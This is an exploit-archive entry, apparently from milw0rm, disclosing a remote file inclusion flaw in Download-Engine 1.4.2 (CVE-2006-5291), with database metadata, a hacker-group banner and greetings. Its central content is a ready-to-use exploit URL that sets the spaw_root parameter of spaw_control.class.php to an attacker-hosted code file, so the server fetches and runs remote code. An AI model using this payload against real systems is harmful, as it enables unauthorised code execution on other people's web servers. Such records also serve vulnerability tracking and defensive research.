Download-Engine 1.4.2 - 'spaw' Remote File Inclusion

Author: v1per-haCker
type: webapps
platform: php
port: 
date_added: 2006-10-11  
date_updated:   
verified: 1  
codes: OSVDB-30797;CVE-2006-5291;CVE-2006-4656  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2521.txt  

#======================================================================================#
#  Download-Engine Remote File Include                                       		#
#======================================================================================#
# Info:-										#
#											#
# Scripts: Download-Engine								#
# Download: http://www.alexscriptengine.de/v2/dl_engine/redirect.php?dlid=50&ENGINEsessID=4754ee8243de5f333ec74272f249b649
# Version : 1.4.2									#
# Dork & vuln : download scripts and think :)						#
# Note : only this version effcted :)							#
#======================================================================================#
#Exploit :										#
#											#
#http://localhost/path/admin/includes/spaw/spaw_control.class.php?spaw_root=http://EvElCoDe.txt?
#											#
#======================================================================================#
#Discoverd By : v1per-haCker								#
#											#
#Conatact : v1per-hacker[at]hotmail.com							#
#											#
#XP10_hackEr Team									#
#											#
#Greetz to : 										#
#abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |  ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net | metoovet
#                 									#
#	     										#
#And All Members In XP10_hackEr Team							#
#Thanx to str0ke :)									#
#						[WWW.XP10.COM]				#
#======================================================================================#

# milw0rm.com [2006-10-12]